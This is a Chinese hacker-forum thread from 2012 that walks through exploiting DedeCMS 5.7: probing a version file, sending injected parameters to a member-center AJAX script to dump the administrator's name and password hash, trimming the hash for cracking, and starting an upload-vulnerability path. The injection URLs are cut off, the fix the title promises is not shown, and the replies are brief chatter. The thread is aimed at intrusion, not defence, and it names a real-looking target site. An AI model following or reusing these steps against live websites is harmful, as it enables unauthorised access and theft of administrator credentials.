设为首页收藏本站
查看: 5141|回复: 3

织梦5.7注入加上传漏洞及修复

[复制链接]
  • TA的每日心情

    2019-10-30 11:47
  • 签到天数: 390 天

    [LV.9]以坛为家II

    发表于 2012-6-17 17:29:04 | 显示全部楼层 |阅读模式
    会员中心查询会员信息语句过滤不严,导致url可提交注入参数;
    会员中心有上传动作过滤不严,导致上传漏洞
    详细说明:
    ①注入漏洞。
    这站http://www.XXX.com/
    首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
    然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
    然后写上语句
    查看管理员帐号
    http://www.xxx.com//member/ajax_ ... &membergroup=@`

    admin www.2cto.com

    查看管理员密码
     http://www.30tianlong.com//membe ... &membergroup=@`

    8d29b1ef9f8c5a5af429

    查看管理员密码

    得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

    8d2
    9b1ef9f8c5a5af42
    9

    cmd5没解出来 只好测试第二个方法


    ②上传漏洞:

    只要登陆会员中心,然后访问页面链接
    “/plus/carbuyaction.php?dopost=memclickout
  • TA的每日心情
    难过
    2015-11-9 10:17
  • 签到天数: 160 天

    [LV.7]常住居民III

    发表于 2012-6-17 17:58:19 | 显示全部楼层
    楼主,我想问下,13位的加密是怎么回事?有没有遇到过?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2019-10-30 11:47
  • 签到天数: 390 天

    [LV.9]以坛为家II

     楼主| 发表于 2013-7-26 02:59:04 | 显示全部楼层
    回复 暗夜传说 的帖子

    听说过、没遇到过
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2019-8-3 14:42
  • 签到天数: 141 天

    [LV.7]常住居民III

    发表于 2018-9-2 13:15:18 | 显示全部楼层
    可以试试,来看看
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    关闭

    站长推荐 上一条 /1 下一条

    红盟社区--中国红客联盟 

    Processed in 0.122541 second(s), 16 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 |   

    Powered by HUC © 2001-2017 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表